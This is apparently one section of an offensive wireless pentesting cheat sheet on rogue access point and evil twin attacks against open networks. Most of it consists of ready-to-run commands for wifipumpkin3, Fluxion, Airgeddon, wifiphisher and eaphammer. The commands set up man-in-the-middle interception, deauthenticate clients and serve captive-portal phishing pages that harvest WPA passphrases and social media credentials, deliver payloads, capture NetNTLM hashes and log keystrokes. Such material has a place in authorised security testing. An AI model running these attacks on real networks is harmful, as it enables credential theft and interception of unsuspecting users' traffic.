11. Open Network (no passphrase) Rogue AP Evil Twin

Basic Open Network

This basic setup can be used to perform standard Man-in-th-Middle attacks on the clients.

berate_ap <interface_AP> <interface_internet> <SSID>

Note: Internet sharing (forwarding) is enabled by default

Open Network Evil Twin + Captive Portal Attack

Captive Portal can be used to serve:

• Phishing page (fake form) to attempt getting:
  • WPA passphrase (when evil twin of WPA/WPA2 secured AP),
  • Credentials (e.g. Facebook, Gmail...)
• Payload Delivery
• NetNTLMv1/v2 hashes by forcing SMB connection

With wifipumpkin3:

wifipumpkin3 --xpulp "set interface wlan0; set ssid FreeWifi; set proxy captiveflask; set captiveflask.DarkLogin true; start"

Note: Custom captive portal can be developed based on: https://github.com/mh4x0f/extra-captiveflask (use misc.extra_captiveflask) https://reigadaopsec.com/how-to-create-a-fake-access-point-with-wifipumpkin3/

With Fluxion (interactive + automated):

To automatically perform Evil Twin Attack against WPA/WPA2 network with captive portal attack aimed at phishing WPA passphrase: Fluxion can be used:

./fluxion.sh  # Starts multiple xterm, requires X session

1. Run Handshake Snooper mode (capture a WPA/WPA2 handshake, used after phishing to check for validity of passphrase
2. Run Captive Portal mode (supports many box/router default web interfaces)
   • Spawn AP with same SSID as target AP (Evil Twin).
   • Send deauth + disassociation to clients.
   • Wait for client connection & successful phishing.
   • Check submitted WPA passphrase using captured handshake.

With Airgeddon (interactive + automated):

To automatically perform Evil Twin Attack against WPA/WPA2 network with captive portal attack aimed at phishing WPA passphrase: Airgeddon can be used (work similarly as Fluxion, works better against Android devices during my tests):

./airgeddon.sh # Starts multiple xterm, requires X session

Open Network Evil Twin + KARMA/MANA/Loud MANA/Known Beacons Attack + Captive Portal

With wifiphisher:

• Evil Twin + KARMA:

wifiphisher -aI <interface_rogue_AP> -eI <interface_deauthenticating> -iI <interface_internet> \
-p firmware-upgrade --handshake-capture handshake.pcap -kN 	# Interactive target AP selection

wifiphisher -aI <interface_rogue_AP> -eI <interface_deauthenticating> -iI <internet_interface> \
-p firmware-upgrade --handshake-capture handshake.pcap --essid <target_SSID> -kN

• Known Beacons Attack:

wifiphisher -aI <interface_rogue_AP> -eI <interface_deauthenticating> -iI <internet_interface> \
-p oauth-login --known-beacons --essid "Free WiFi" -kN

Note: Known beacons wordlist: https://github.com/wifiphisher/wifiphisher/blob/master/wifiphisher/data/wifiphisher-known-open-wlans

-p is for captive portal scenario. Scenarios available:

• oauth-login: Facebook OAuth login page (ask for fb creds)
• firmware-upgrade: Firmware Upgrade Page (ask for WPA passphrase)
• plugin_update: Browser Plugin Update (can serve payload)
• wifi_connect: Network Manager Connect (imitates behaviour of network manager, ask for WPA passphrase)
• Additional scenarios: https://github.com/wifiphisher/extra-phishing-pages
• Create custom scenario: https://wifiphisher.readthedocs.io/en/latest/custom_phishing_scenario.html

With eaphammer:

• Evil Twin + MANA (Improved KARMA):

./eaphammer -i wlan0 --channel <channel_number> --auth open --essid <SSID> \
--captive-portal --mana

• Evil Twin + Loud MANA (Improved MANA):

./eaphammer -i wlan0 --channel <channel_number> --auth open --essid <SSID>\
--captive-portal --mana --loud

• Evil Twin + Loud MANA (Improved MANA) + Known Beacons attack (to attack clients not performing active probing) - All-in-one / Most effective:

./eaphammer -i wlan0 --channel <channel_number> --auth open --essid <SSID> \
--captive-portal --mana --loud --known-beacons --known-ssids-file <ssid_wordlist>

Captive portal attack can capture credentials using:

• Form submission sniffing
• Keystroke capture (results stored in user.log)